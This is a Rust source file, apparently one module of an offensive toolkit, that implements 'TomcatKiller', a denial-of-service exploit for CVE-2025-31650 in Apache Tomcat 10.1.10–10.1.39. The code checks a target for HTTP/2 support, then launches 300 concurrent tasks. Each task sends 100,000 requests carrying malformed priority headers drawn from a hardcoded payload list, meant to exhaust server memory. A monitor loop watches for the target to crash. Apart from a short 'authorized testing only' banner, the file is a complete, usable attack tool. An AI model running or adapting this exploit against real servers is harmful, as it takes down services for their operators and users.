use anyhow::{anyhow, bail, Result};
use colored::*;
use rand::Rng;
use reqwest::{ClientBuilder};
use std::io::{self, Write};
use std::net::{TcpStream, ToSocketAddrs};
use std::time::Duration;
use tokio::time::sleep;
use rand::prelude::IndexedRandom;

/// TomcatKiller - CVE-2025-31650
/// Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers
pub async fn run(target: &str) -> Result<()> {
    println!("{}", "===== TomcatKiller - CVE-2025-31650 =====".blue());
    println!("Developed by: @absholi7ly");
    println!("Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.");
    println!("{}", "Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.".yellow());

    let port = prompt_for_port().unwrap_or(443);
    let normalized = if target.starts_with("http://") || target.starts_with("https://") {
        target.to_string()
    } else {
        format!("https://{}", target)
    };

    let (host, _) = match validate_url(&normalized) {
        Ok(hp) => hp,
        Err(e) => {
            eprintln!("{}", format!("Invalid target URL: {e}").red());
            return Err(e);
        }
    };

    let clean_host = strip_ipv6_brackets(&host);
    let num_tasks = 300;
    let requests_per_task = 100000;

    match check_http2_support(&clean_host, port).await {
        Ok(true) => {
            println!("{}", format!("Starting attack on {}:{}...", clean_host, port).green());
            println!("Tasks: {}, Requests per task: {}", num_tasks, requests_per_task);
            println!("{}", "Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.".yellow());

            let monitor_handle = tokio::spawn(monitor_server(clean_host.clone(), port));
            let mut handles = Vec::new();

            for i in 0..num_tasks {
                let h = clean_host.clone();
                handles.push(tokio::spawn(send_invalid_priority_requests(h, port, requests_per_task, i)));
            }

            for handle in handles {
                let _ = handle.await;
            }

            monitor_handle.abort();
        }
        Ok(false) => {
            bail!("Target does not support HTTP/2. Exploit not applicable.");
        }
        Err(e) => {
            eprintln!("{}", format!("[!] Error checking HTTP/2 support: {e}").red());
            return Err(e);
        }
    }

    Ok(())
}

fn prompt_for_port() -> Option<u16> {
    print!("{}", "Enter target port (default 443): ".cyan());
    io::stdout().flush().ok()?;

    let mut buffer = String::new();
    io::stdin().read_line(&mut buffer).ok()?;

    let trimmed = buffer.trim();
    if trimmed.is_empty() {
        Some(443)
    } else {
        trimmed.parse::<u16>().ok()
    }
}

fn strip_ipv6_brackets(host: &str) -> String {
    host.trim_matches(|c| c == '[' || c == ']').to_string()
}

fn validate_url(url: &str) -> Result<(String, u16)> {
    let parsed = url::Url::parse(url)?;
    let host = parsed.host_str().ok_or_else(|| anyhow!("Invalid URL format"))?.to_string();
    let port = parsed.port_or_known_default().unwrap_or(443);
    Ok((host, port))
}

async fn check_http2_support(host: &str, port: u16) -> Result<bool> {
    let client = ClientBuilder::new()
        .http2_prior_knowledge()
        .danger_accept_invalid_certs(true)
        .timeout(Duration::from_secs(5))
        .build()?;

    let url = format!("https://{}:{}/", host, port);
    let resp = client.get(&url).header("user-agent", "TomcatKiller").send().await;

    match resp {
        Ok(response) => {
            if response.version() == reqwest::Version::HTTP_2 {
                println!("{}", "HTTP/2 supported! Proceeding ...".green());
                Ok(true)
            } else {
                println!("{}", "Server responded, but HTTP/2 not used.".yellow());
                Ok(false)
            }
        }
        Err(e) => {
            println!("{}", format!("Connection failed: {}:{}. Reason: {e}", host, port).red());
            Ok(false)
        }
    }
}

async fn send_invalid_priority_requests(host: String, port: u16, count: usize, task_id: usize) {
    let priorities = get_invalid_priorities();
    let client = match ClientBuilder::new()
        .http2_prior_knowledge()
        .danger_accept_invalid_certs(true)
        .timeout(Duration::from_millis(300))
        .build()
    {
        Ok(c) => c,
        Err(_) => return,
    };

    let url = format!("https://{}:{}/", host, port);

    for _ in 0..count {
        let prio = priorities.choose(&mut rand::rng()).unwrap().to_string();
        let headers = [
            ("priority", prio),
            ("user-agent", format!("TomcatKiller-{}-{}", task_id, rand::rng().random::<u32>())),
            ("cache-control", "no-cache".to_string()),
            ("accept", format!("*/*; q={}", rand::rng().random_range(0.1..1.0))),
        ];

        let mut req = client.get(&url);
        for (k, v) in headers.iter() {
            req = req.header(*k, v);
        }

        let _ = req.send().await;
    }
}

async fn monitor_server(host: String, port: u16) {
    loop {
        let addr_result = format!("{}:{}", host, port).to_socket_addrs();

        match addr_result {
            Ok(mut addrs) => {
                if let Some(addr) = addrs.next() {
                    if TcpStream::connect_timeout(&addr, Duration::from_secs(2)).is_ok() {
                        println!("{}", format!("Target {}:{} is reachable.", host, port).yellow());
                    } else {
                        println!("{}", format!("Target {}:{} unreachable or crashed!", host, port).red());
                        break;
                    }
                } else {
                    println!("{}", "DNS lookup failed.".red());
                    break;
                }
            }
            Err(_) => {
                println!("{}", "Failed to resolve host for monitoring.".red());
                break;
            }
        }

        sleep(Duration::from_secs(2)).await;
    }
}

fn get_invalid_priorities() -> Vec<&'static str> {
    vec![
        "u=-1, q=2", "u=4294967295, q=-1", "u=-2147483648, q=1.5", "u=0, q=invalid",
        "u=1/0, q=NaN", "u=1, q=2, invalid=param", "", "u=1, q=1, u=2",
        "u=99999999999999999999, q=0", "u=-99999999999999999999, q=0", "u=, q=",
        "u=1, q=1, malformed", "u=1, q=, invalid", "u=-1, q=4294967295",
        "u=invalid, q=1", "u=1, q=1, extra=😈", "u=1, q=1; malformed", "u=1, q=1, =invalid",
        "u=0, q=0, stream=invalid", "u=1, q=1, priority=recursive", "u=1, q=1, %invalid%",
        "u=0, q=0, null=0",
    ]
}
